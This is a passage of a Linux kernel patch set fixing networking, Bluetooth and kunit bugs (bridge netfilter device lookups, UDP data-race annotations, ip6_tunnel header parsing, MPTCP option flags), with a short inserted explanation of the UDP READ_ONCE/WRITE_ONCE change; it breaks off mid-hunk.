+index b08bb1fba106d..de5e71458358e 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -52,12 +52,14 @@ static void debugfs_print_result(struct seq_file *seq,
+ static int debugfs_print_results(struct seq_file *seq, void *v)
+ {
+ 	struct kunit_suite *suite = (struct kunit_suite *)seq->private;
+-	enum kunit_status success = kunit_suite_has_succeeded(suite);
++	enum kunit_status success;
+ 	struct kunit_case *test_case;
+ 
+ 	if (!suite)
+ 		return 0;
+ 
++	success = kunit_suite_has_succeeded(suite);
++
+ 	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
+ 	seq_puts(seq, "KTAP version 1\n");
+ 	seq_puts(seq, "1..1\n");
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 55e0ecd88543e..12d36875358b9 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -2314,12 +2314,10 @@ static int hci_conn_auth(struct hci_conn *conn, __u8 sec_level, __u8 auth_type)
+ 		hci_send_cmd(conn->hdev, HCI_OP_AUTH_REQUESTED,
+ 			     sizeof(cp), &cp);
+ 
+-		/* If we're already encrypted set the REAUTH_PEND flag,
+-		 * otherwise set the ENCRYPT_PEND.
++		/* Set the ENCRYPT_PEND to trigger encryption after
++		 * authentication.
+ 		 */
+-		if (test_bit(HCI_CONN_ENCRYPT, &conn->flags))
+-			set_bit(HCI_CONN_REAUTH_PEND, &conn->flags);
+-		else
++		if (!test_bit(HCI_CONN_ENCRYPT, &conn->flags))
+ 			set_bit(HCI_CONN_ENCRYPT_PEND, &conn->flags);
+ 	}
+ 
+diff --git a/net/bluetooth/hci_debugfs.c b/net/bluetooth/hci_debugfs.c
+index 3f401ec5bb0c6..6124b3425f351 100644
+--- a/net/bluetooth/hci_debugfs.c
++++ b/net/bluetooth/hci_debugfs.c
+@@ -1045,10 +1045,12 @@ static int min_key_size_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val > hdev->le_max_key_size || val < SMP_MIN_ENC_KEY_SIZE)
++	hci_dev_lock(hdev);
++	if (val > hdev->le_max_key_size || val < SMP_MIN_ENC_KEY_SIZE) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_min_key_size = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -1073,10 +1075,12 @@ static int max_key_size_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val > SMP_MAX_ENC_KEY_SIZE || val < hdev->le_min_key_size)
++	hci_dev_lock(hdev);
++	if (val > SMP_MAX_ENC_KEY_SIZE || val < hdev->le_min_key_size) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_max_key_size = val;
+ 	hci_dev_unlock(hdev);
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index dcb13c64e8e7c..56ecc5f97b916 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3511,14 +3511,8 @@ static void hci_auth_complete_evt(struct hci_dev *hdev, void *data,
+ 
+ 	if (!ev->status) {
+ 		clear_bit(HCI_CONN_AUTH_FAILURE, &conn->flags);
+-
+-		if (!hci_conn_ssp_enabled(conn) &&
+-		    test_bit(HCI_CONN_REAUTH_PEND, &conn->flags)) {
+-			bt_dev_info(hdev, "re-auth of legacy device is not possible.");
+-		} else {
+-			set_bit(HCI_CONN_AUTH, &conn->flags);
+-			conn->sec_level = conn->pending_sec_level;
+-		}
++		set_bit(HCI_CONN_AUTH, &conn->flags);
++		conn->sec_level = conn->pending_sec_level;
+ 	} else {
+ 		if (ev->status == HCI_ERROR_PIN_OR_KEY_MISSING)
+ 			set_bit(HCI_CONN_AUTH_FAILURE, &conn->flags);
+@@ -3527,7 +3521,6 @@ static void hci_auth_complete_evt(struct hci_dev *hdev, void *data,
+ 	}
+ 
+ 	clear_bit(HCI_CONN_AUTH_PEND, &conn->flags);
+-	clear_bit(HCI_CONN_REAUTH_PEND, &conn->flags);
+ 
+ 	if (conn->state == BT_CONFIG) {
+ 		if (!ev->status && hci_conn_ssp_enabled(conn)) {
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 01d690d9fe5f8..202ad43e35d6b 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -279,8 +279,17 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 
+ 		if ((READ_ONCE(neigh->nud_state) & NUD_CONNECTED) &&
+ 		    READ_ONCE(neigh->hh.hh_len)) {
++			struct net_device *br_indev;
++
++			br_indev = nf_bridge_get_physindev(skb, net);
++			if (!br_indev) {
++				neigh_release(neigh);
++				goto free_skb;
++			}
++
+ 			neigh_hh_bridge(&neigh->hh, skb);
+-			skb->dev = nf_bridge->physindev;
++			skb->dev = br_indev;
++
+ 			ret = br_handle_frame_finish(net, sk, skb);
+ 		} else {
+ 			/* the neighbour function below overwrites the complete
+@@ -352,12 +361,18 @@ br_nf_ipv4_daddr_was_changed(const struct sk_buff *skb,
+  */
+ static int br_nf_pre_routing_finish(struct net *net, struct sock *sk, struct sk_buff *skb)
+ {
+-	struct net_device *dev = skb->dev;
++	struct net_device *dev = skb->dev, *br_indev;
+ 	struct iphdr *iph = ip_hdr(skb);
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 	struct rtable *rt;
+ 	int err;
+ 
++	br_indev = nf_bridge_get_physindev(skb, net);
++	if (!br_indev) {
++		kfree_skb(skb);
++		return 0;
++	}
++
+ 	nf_bridge->frag_max_size = IPCB(skb)->frag_max_size;
+ 
+ 	if (nf_bridge->pkt_otherhost) {
+@@ -397,7 +412,7 @@ free_skb:
+ 		} else {
+ 			if (skb_dst(skb)->dev == dev) {
+ bridged_dnat:
+-				skb->dev = nf_bridge->physindev;
++				skb->dev = br_indev;
+ 				nf_bridge_update_protocol(skb);
+ 				nf_bridge_push_encap_header(skb);
+ 				br_nf_hook_thresh(NF_BR_PRE_ROUTING,
+@@ -410,7 +425,7 @@ bridged_dnat:
+ 			skb->pkt_type = PACKET_HOST;
+ 		}
+ 	} else {
+-		rt = bridge_parent_rtable(nf_bridge->physindev);
++		rt = bridge_parent_rtable(br_indev);
+ 		if (!rt) {
+ 			kfree_skb(skb);
+ 			return 0;
+@@ -419,7 +434,7 @@ bridged_dnat:
+ 		skb_dst_set_noref(skb, &rt->dst);
+ 	}
+ 
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 	nf_bridge_update_protocol(skb);
+ 	nf_bridge_push_encap_header(skb);
+ 	br_nf_hook_thresh(NF_BR_PRE_ROUTING, net, sk, skb, skb->dev, NULL,
+@@ -456,7 +471,7 @@ struct net_device *setup_pre_routing(struct sk_buff *skb, const struct net *net)
+ 	}
+ 
+ 	nf_bridge->in_prerouting = 1;
+-	nf_bridge->physindev = skb->dev;
++	nf_bridge->physinif = skb->dev->ifindex;
+ 	skb->dev = brnf_get_logical_dev(skb, skb->dev, net);
+ 
+ 	if (skb->protocol == htons(ETH_P_8021Q))
+@@ -553,7 +568,11 @@ static int br_nf_forward_finish(struct net *net, struct sock *sk, struct sk_buff
+ 		if (skb->protocol == htons(ETH_P_IPV6))
+ 			nf_bridge->frag_max_size = IP6CB(skb)->frag_max_size;
+ 
+-		in = nf_bridge->physindev;
++		in = nf_bridge_get_physindev(skb, net);
++		if (!in) {
++			kfree_skb(skb);
++			return 0;
++		}
+ 		if (nf_bridge->pkt_otherhost) {
+ 			skb->pkt_type = PACKET_OTHERHOST;
+ 			nf_bridge->pkt_otherhost = false;
+@@ -897,6 +916,13 @@ static unsigned int ip_sabotage_in(void *priv,
+ static void br_nf_pre_routing_finish_bridge_slow(struct sk_buff *skb)
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
++	struct net_device *br_indev;
++
++	br_indev = nf_bridge_get_physindev(skb, dev_net(skb->dev));
++	if (!br_indev) {
++		kfree_skb(skb);
++		return;
++	}
+ 
+ 	skb_pull(skb, ETH_HLEN);
+ 	nf_bridge->bridged_dnat = 0;
+@@ -906,7 +932,7 @@ static void br_nf_pre_routing_finish_bridge_slow(struct sk_buff *skb)
+ 	skb_copy_to_linear_data_offset(skb, -(ETH_HLEN - ETH_ALEN),
+ 				       nf_bridge->neigh_header,
+ 				       ETH_HLEN - ETH_ALEN);
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 
+ 	nf_bridge->physoutdev = NULL;
+ 	br_handle_frame_finish(dev_net(skb->dev), NULL, skb);
+diff --git a/net/bridge/br_netfilter_ipv6.c b/net/bridge/br_netfilter_ipv6.c
+index 6b07f30675bb0..cd24ab9bb136f 100644
+--- a/net/bridge/br_netfilter_ipv6.c
++++ b/net/bridge/br_netfilter_ipv6.c
+@@ -161,9 +161,15 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 	struct rtable *rt;
+-	struct net_device *dev = skb->dev;
++	struct net_device *dev = skb->dev, *br_indev;
+ 	const struct nf_ipv6_ops *v6ops = nf_get_ipv6_ops();
+ 
++	br_indev = nf_bridge_get_physindev(skb, net);
++	if (!br_indev) {
++		kfree_skb(skb);
++		return 0;
++	}
++
+ 	nf_bridge->frag_max_size = IP6CB(skb)->frag_max_size;
+ 
+ 	if (nf_bridge->pkt_otherhost) {
+@@ -181,7 +187,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		}
+ 
+ 		if (skb_dst(skb)->dev == dev) {
+-			skb->dev = nf_bridge->physindev;
++			skb->dev = br_indev;
+ 			nf_bridge_update_protocol(skb);
+ 			nf_bridge_push_encap_header(skb);
+ 			br_nf_hook_thresh(NF_BR_PRE_ROUTING,
+@@ -192,7 +198,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		ether_addr_copy(eth_hdr(skb)->h_dest, dev->dev_addr);
+ 		skb->pkt_type = PACKET_HOST;
+ 	} else {
+-		rt = bridge_parent_rtable(nf_bridge->physindev);
++		rt = bridge_parent_rtable(br_indev);
+ 		if (!rt) {
+ 			kfree_skb(skb);
+ 			return 0;
+@@ -201,7 +207,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		skb_dst_set_noref(skb, &rt->dst);
+ 	}
+ 
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 	nf_bridge_update_protocol(skb);
+ 	nf_bridge_push_encap_header(skb);
+ 	br_nf_hook_thresh(NF_BR_PRE_ROUTING, net, sk, skb,
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 854b3fd66b1be..7cf1e42d7f93b 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -2797,13 +2797,6 @@ static int do_setlink(const struct sk_buff *skb,
+ 		call_netdevice_notifiers(NETDEV_CHANGEADDR, dev);
+ 	}
+ 
+-	if (tb[IFLA_MASTER]) {
+-		err = do_set_master(dev, nla_get_u32(tb[IFLA_MASTER]), extack);
+-		if (err)
+-			goto errout;
+-		status |= DO_SETLINK_MODIFIED;
+-	}
+-
+ 	if (ifm->ifi_flags || ifm->ifi_change) {
+ 		err = dev_change_flags(dev, rtnl_dev_combine_flags(dev, ifm),
+ 				       extack);
+@@ -2811,6 +2804,13 @@ static int do_setlink(const struct sk_buff *skb,
+ 			goto errout;
+ 	}
+ 
++	if (tb[IFLA_MASTER]) {
++		err = do_set_master(dev, nla_get_u32(tb[IFLA_MASTER]), extack);
++		if (err)
++			goto errout;
++		status |= DO_SETLINK_MODIFIED;
++	}
++
+ 	if (tb[IFLA_CARRIER]) {
+ 		err = dev_change_carrier(dev, nla_get_u8(tb[IFLA_CARRIER]));
+ 		if (err)
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 8324e9f970668..26a9d8434c234 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -104,7 +104,7 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 		const struct dns_server_list_v1_header *v1;
+ 
+ 		/* It may be a server list. */
+-		if (datalen <= sizeof(*v1))
++		if (datalen < sizeof(*v1))
+ 			return -EINVAL;
+ 
+ 		v1 = (const struct dns_server_list_v1_header *)data;
+diff --git a/net/ethtool/features.c b/net/ethtool/features.c
+index 55d449a2d3fcb..090e493f592ef 100644
+--- a/net/ethtool/features.c
++++ b/net/ethtool/features.c
+@@ -234,17 +234,20 @@ int ethnl_set_features(struct sk_buff *skb, struct genl_info *info)
+ 	dev = req_info.dev;
+ 
+ 	rtnl_lock();
++	ret = ethnl_ops_begin(dev);
++	if (ret < 0)
++		goto out_rtnl;
+ 	ethnl_features_to_bitmap(old_active, dev->features);
+ 	ethnl_features_to_bitmap(old_wanted, dev->wanted_features);
+ 	ret = ethnl_parse_bitset(req_wanted, req_mask, NETDEV_FEATURE_COUNT,
+ 				 tb[ETHTOOL_A_FEATURES_WANTED],
+ 				 netdev_features_strings, info->extack);
+ 	if (ret < 0)
+-		goto out_rtnl;
++		goto out_ops;
+ 	if (ethnl_bitmap_to_features(req_mask) & ~NETIF_F_ETHTOOL_BITS) {
+ 		GENL_SET_ERR_MSG(info, "attempt to change non-ethtool features");
+ 		ret = -EINVAL;
+-		goto out_rtnl;
++		goto out_ops;
+ 	}
+ 
+ 	/* set req_wanted bits not in req_mask from old_wanted */
+@@ -281,6 +284,8 @@ int ethnl_set_features(struct sk_buff *skb, struct genl_info *info)
+ 	if (mod)
+ 		netdev_features_change(dev);
+ 
++out_ops:
++	ethnl_ops_complete(dev);
+ out_rtnl:
+ 	rtnl_unlock();
+ 	ethnl_parse_header_dev_put(&req_info);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 347c3768df6e8..c13b8ed63f87e 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -1642,6 +1642,7 @@ int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
+ #endif
+ 	return -EINVAL;
+ }
++EXPORT_SYMBOL(inet_recv_error);
+ 
+ int inet_gro_complete(struct sk_buff *skb, int nhoff)
+ {
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index e04544ac4b454..b807197475a57 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1025,6 +1025,10 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
++	mroute_sk = rcu_dereference(mrt->mroute_sk);
++	if (!mroute_sk)
++		return -EINVAL;
++
+ 	if (assert == IGMPMSG_WHOLEPKT || assert == IGMPMSG_WRVIFWHOLE)
+ 		skb = skb_realloc_headroom(pkt, sizeof(struct iphdr));
+ 	else
+@@ -1069,7 +1073,8 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		msg = (struct igmpmsg *)skb_network_header(skb);
+ 		msg->im_vif = vifi;
+ 		msg->im_vif_hi = vifi >> 8;
+-		skb_dst_set(skb, dst_clone(skb_dst(pkt)));
++		ipv4_pktinfo_prepare(mroute_sk, pkt);
++		memcpy(skb->cb, pkt->cb, sizeof(skb->cb));
+ 		/* Add our header */
+ 		igmp = skb_put(skb, sizeof(struct igmphdr));
+ 		igmp->type = assert;
+@@ -1079,12 +1084,6 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		skb->transport_header = skb->network_header;
+ 	}
+ 
+-	mroute_sk = rcu_dereference(mrt->mroute_sk);
+-	if (!mroute_sk) {
+-		kfree_skb(skb);
+-		return -EINVAL;
+-	}
+-
+ 	igmpmsg_netlink_event(mrt, skb);
+ 
+ 	/* Deliver to mrouted */
+diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
+index d640adcaf1b12..4073762996e22 100644
+--- a/net/ipv4/netfilter/nf_reject_ipv4.c
++++ b/net/ipv4/netfilter/nf_reject_ipv4.c
+@@ -239,7 +239,6 @@ static int nf_reject_fill_skb_dst(struct sk_buff *skb_in)
+ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		   int hook)
+ {
+-	struct net_device *br_indev __maybe_unused;
+ 	struct sk_buff *nskb;
+ 	struct iphdr *niph;
+ 	const struct tcphdr *oth;
+@@ -288,9 +287,13 @@ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	 * build the eth header using the original destination's MAC as the
+ 	 * source, and send the RST packet directly.
+ 	 */
+-	br_indev = nf_bridge_get_physindev(oldskb);
+-	if (br_indev) {
++	if (nf_bridge_info_exists(oldskb)) {
+ 		struct ethhdr *oeth = eth_hdr(oldskb);
++		struct net_device *br_indev;
++
++		br_indev = nf_bridge_get_physindev(oldskb, net);
++		if (!br_indev)
++			goto free_nskb;
+ 
+ 		nskb->dev = br_indev;
+ 		niph->tot_len = htons(nskb->len);
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 5672d9a86c5d2..11c0e1c666429 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -823,7 +823,7 @@ void udp_flush_pending_frames(struct sock *sk)
+ 
+ 	if (up->pending) {
+ 		up->len = 0;
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 		ip_flush_pending_frames(sk);
+ 	}
+ }
+@@ -1010,7 +1010,7 @@ int udp_push_pending_frames(struct sock *sk)
+ 
+ out:
+ 	up->len = 0;
+-	up->pending = 0;
++	WRITE_ONCE(up->pending, 0);
+ 	return err;
+ }
+ EXPORT_SYMBOL(udp_push_pending_frames);
+@@ -1086,7 +1086,7 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	getfrag = is_udplite ? udplite_getfrag : ip_generic_getfrag;
+ 
+ 	fl4 = &inet->cork.fl.u.ip4;
+-	if (up->pending) {
++	if (READ_ONCE(up->pending)) {
+ 		/*
+ 		 * There are pending frames.
+ 		 * The socket lock must be held while it's corked.
+@@ -1287,7 +1287,7 @@ back_from_confirm:
+ 	fl4->saddr = saddr;
+ 	fl4->fl4_dport = dport;
+ 	fl4->fl4_sport = inet->inet_sport;
+-	up->pending = AF_INET;
++	WRITE_ONCE(up->pending, AF_INET);
+ 
+ do_append_data:
+ 	up->len += ulen;
+@@ -1299,7 +1299,7 @@ do_append_data:
+ 	else if (!corkreq)
+ 		err = udp_push_pending_frames(sk);
+ 	else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 	release_sock(sk);
+ 
+ out:
+@@ -1337,7 +1337,7 @@ void udp_splice_eof(struct socket *sock)
+ 	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+ 
+-	if (!up->pending || udp_test_bit(CORK, sk))
++	if (!READ_ONCE(up->pending) || udp_test_bit(CORK, sk))
+ 		return;
+ 
+ 	lock_sock(sk);
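
All of these annotations serve one fix: udp_splice_eof() now reads up->pending without holding the socket lock, so every access to the field must be single-copy atomic or the compiler is free to tear, fuse, or re-load it. The closest portable userspace analogue, with illustrative names, uses C11 relaxed atomics:

#include <stdatomic.h>
#include <stdio.h>

static _Atomic int pending;            /* cf. up->pending */

static void set_pending(int v)         /* writer holds the socket lock */
{
	atomic_store_explicit(&pending, v, memory_order_relaxed); /* WRITE_ONCE() */
}

static int check_pending(void)         /* lockless reader, cf. udp_splice_eof() */
{
	return atomic_load_explicit(&pending, memory_order_relaxed); /* READ_ONCE() */
}

int main(void)
{
	set_pending(1);
	printf("%d\n", check_pending());   /* prints 1 */
	return 0;
}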
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index afc922c88d179..9125e92d9917e 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -399,7 +399,7 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 	const struct ipv6hdr *ipv6h = (const struct ipv6hdr *)raw;
+ 	unsigned int nhoff = raw - skb->data;
+ 	unsigned int off = nhoff + sizeof(*ipv6h);
+-	u8 next, nexthdr = ipv6h->nexthdr;
++	u8 nexthdr = ipv6h->nexthdr;
+ 
+ 	while (ipv6_ext_hdr(nexthdr) && nexthdr != NEXTHDR_NONE) {
+ 		struct ipv6_opt_hdr *hdr;
+@@ -410,25 +410,25 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 
+ 		hdr = (struct ipv6_opt_hdr *)(skb->data + off);
+ 		if (nexthdr == NEXTHDR_FRAGMENT) {
+-			struct frag_hdr *frag_hdr = (struct frag_hdr *) hdr;
+-			if (frag_hdr->frag_off)
+-				break;
+ 			optlen = 8;
+ 		} else if (nexthdr == NEXTHDR_AUTH) {
+ 			optlen = ipv6_authlen(hdr);
+ 		} else {
+ 			optlen = ipv6_optlen(hdr);
+ 		}
+-		/* cache hdr->nexthdr, since pskb_may_pull() might
+-		 * invalidate hdr
+-		 */
+-		next = hdr->nexthdr;
+-		if (nexthdr == NEXTHDR_DEST) {
+-			u16 i = 2;
+ 
+-			/* Remember : hdr is no longer valid at this point. */
+-			if (!pskb_may_pull(skb, off + optlen))
++		if (!pskb_may_pull(skb, off + optlen))
++			break;
++
++		hdr = (struct ipv6_opt_hdr *)(skb->data + off);
++		if (nexthdr == NEXTHDR_FRAGMENT) {
++			struct frag_hdr *frag_hdr = (struct frag_hdr *)hdr;
++
++			if (frag_hdr->frag_off)
+ 				break;
++		}
++		if (nexthdr == NEXTHDR_DEST) {
++			u16 i = 2;
+ 
+ 			while (1) {
+ 				struct ipv6_tlv_tnl_enc_lim *tel;
+@@ -449,7 +449,7 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 					i++;
+ 			}
+ 		}
+-		nexthdr = next;
++		nexthdr = hdr->nexthdr;
+ 		off += optlen;
+ 	}
+ 	return 0;
+diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
+index 7860383295d84..566f3b7b957e9 100644
+--- a/net/ipv6/mcast.c
++++ b/net/ipv6/mcast.c
+@@ -2725,8 +2725,12 @@ void ipv6_mc_down(struct inet6_dev *idev)
+ 	synchronize_net();
+ 	mld_query_stop_work(idev);
+ 	mld_report_stop_work(idev);
++
++	mutex_lock(&idev->mc_lock);
+ 	mld_ifc_stop_work(idev);
+ 	mld_gq_stop_work(idev);
++	mutex_unlock(&idev->mc_lock);
++
+ 	mld_dad_stop_work(idev);
+ }
+ 
+diff --git a/net/ipv6/netfilter/nf_reject_ipv6.c b/net/ipv6/netfilter/nf_reject_ipv6.c
+index f61d4f18e1cf5..433d98bbe33f7 100644
+--- a/net/ipv6/netfilter/nf_reject_ipv6.c
++++ b/net/ipv6/netfilter/nf_reject_ipv6.c
+@@ -278,7 +278,6 @@ static int nf_reject6_fill_skb_dst(struct sk_buff *skb_in)
+ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		    int hook)
+ {
+-	struct net_device *br_indev __maybe_unused;
+ 	struct sk_buff *nskb;
+ 	struct tcphdr _otcph;
+ 	const struct tcphdr *otcph;
+@@ -353,9 +352,15 @@ void nf_send_reset6(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	 * build the eth header using the original destination's MAC as the
+ 	 * source, and send the RST packet directly.
+ 	 */
+-	br_indev = nf_bridge_get_physindev(oldskb);
+-	if (br_indev) {
++	if (nf_bridge_info_exists(oldskb)) {
+ 		struct ethhdr *oeth = eth_hdr(oldskb);
++		struct net_device *br_indev;
++
++		br_indev = nf_bridge_get_physindev(oldskb, net);
++		if (!br_indev) {
++			kfree_skb(nskb);
++			return;
++		}
+ 
+ 		nskb->dev = br_indev;
+ 		nskb->protocol = htons(ETH_P_IPV6);
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 961106eda69d0..c2c02dea6c386 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1152,7 +1152,7 @@ static void udp_v6_flush_pending_frames(struct sock *sk)
+ 		udp_flush_pending_frames(sk);
+ 	else if (up->pending) {
+ 		up->len = 0;
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 		ip6_flush_pending_frames(sk);
+ 	}
+ }
+@@ -1330,7 +1330,7 @@ static int udp_v6_push_pending_frames(struct sock *sk)
+ 			      &inet_sk(sk)->cork.base);
+ out:
+ 	up->len = 0;
+-	up->pending = 0;
++	WRITE_ONCE(up->pending, 0);
+ 	return err;
+ }
+ 
+@@ -1387,7 +1387,7 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 		default:
+ 			return -EINVAL;
+ 		}
+-	} else if (!up->pending) {
++	} else if (!READ_ONCE(up->pending)) {
+ 		if (sk->sk_state != TCP_ESTABLISHED)
+ 			return -EDESTADDRREQ;
+ 		daddr = &sk->sk_v6_daddr;
+@@ -1418,8 +1418,8 @@ do_udp_sendmsg:
+ 		return -EMSGSIZE;
+ 
+ 	getfrag  =  is_udplite ?  udplite_getfrag : ip_generic_getfrag;
+-	if (up->pending) {
+-		if (up->pending == AF_INET)
++	if (READ_ONCE(up->pending)) {
++		if (READ_ONCE(up->pending) == AF_INET)
+ 			return udp_sendmsg(sk, msg, len);
+ 		/*
+ 		 * There are pending frames.
+@@ -1609,7 +1609,7 @@ back_from_confirm:
+ 		goto out;
+ 	}
+ 
+-	up->pending = AF_INET6;
++	WRITE_ONCE(up->pending, AF_INET6);
+ 
+ do_append_data:
+ 	if (ipc6.dontfrag < 0)
+@@ -1623,7 +1623,7 @@ do_append_data:
+ 	else if (!corkreq)
+ 		err = udp_v6_push_pending_frames(sk);
+ 	else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 
+ 	if (err > 0)
+ 		err = np->recverr ? net_xmit_errno(err) : 0;
+@@ -1663,7 +1663,7 @@ static void udpv6_splice_eof(struct socket *sock)
+ 	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+ 
+-	if (!up->pending || udp_test_bit(CORK, sk))
++	if (!READ_ONCE(up->pending) || udp_test_bit(CORK, sk))
+ 		return;
+ 
+ 	lock_sock(sk);
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 74027bb5b4296..a718ebcb5bc63 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -118,8 +118,8 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 		break;
+ 
+ 	case MPTCPOPT_MP_JOIN:
+-		mp_opt->suboptions |= OPTIONS_MPTCP_MPJ;
+ 		if (opsize == TCPOLEN_MPTCP_MPJ_SYN) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_SYN;
+ 			mp_opt->backup = *ptr++ & MPTCPOPT_BACKUP;
+ 			mp_opt->join_id = *ptr++;
+ 			mp_opt->token = get_unaligned_be32(ptr);
+@@ -130,6 +130,7 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->token, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_SYNACK) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_SYNACK;
+ 			mp_opt->backup = *ptr++ & MPTCPOPT_BACKUP;
+ 			mp_opt->join_id = *ptr++;
+ 			mp_opt->thmac = get_unaligned_be64(ptr);
+@@ -140,11 +141,10 @@ static void mptcp_parse_option(const struct sk_buff *skb,
+ 				 mp_opt->backup, mp_opt->join_id,
+ 				 mp_opt->thmac, mp_opt->nonce);
+ 		} else if (opsize == TCPOLEN_MPTCP_MPJ_ACK) {
++			mp_opt->suboptions |= OPTION_MPTCP_MPJ_ACK;
+ 			ptr += 2;
+ 			memcpy(mp_opt->hmac, ptr, MPTCPOPT_HMAC_LEN);
+ 			pr_debug("MP_JOIN hmac");
+-		} else {
+-			mp_opt->suboptions &= ~OPTIONS_MPTCP_MPJ;
+ 		}
+ 		break;
+ 
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 8ed7769cae836..45d20e20cfc00 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -156,8 +156,8 @@ static int subflow_check_req(struct request_sock *req,
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 
+-	opt_mp_capable = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPC);
+-	opt_mp_join = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPJ);
++	opt_mp_capable = !!(mp_opt.suboptions & OPTION_MPTCP_MPC_SYN);
++	opt_mp_join = !!(mp_opt.suboptions & OPTION_MPTCP_MPJ_SYN);
+ 	if (opt_mp_capable) {
+ 		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_MPCAPABLEPASSIVE);
+ 
+@@ -253,8 +253,8 @@ int mptcp_subflow_init_cookie_req(struct request_sock *req,
+ 	subflow_init_req(req, sk_listener);
+ 	mptcp_get_options(skb, &mp_opt);
+ 
+-	opt_mp_capable = !!(mp_opt.suboptions & OPTIONS_MPTCP_MPC);
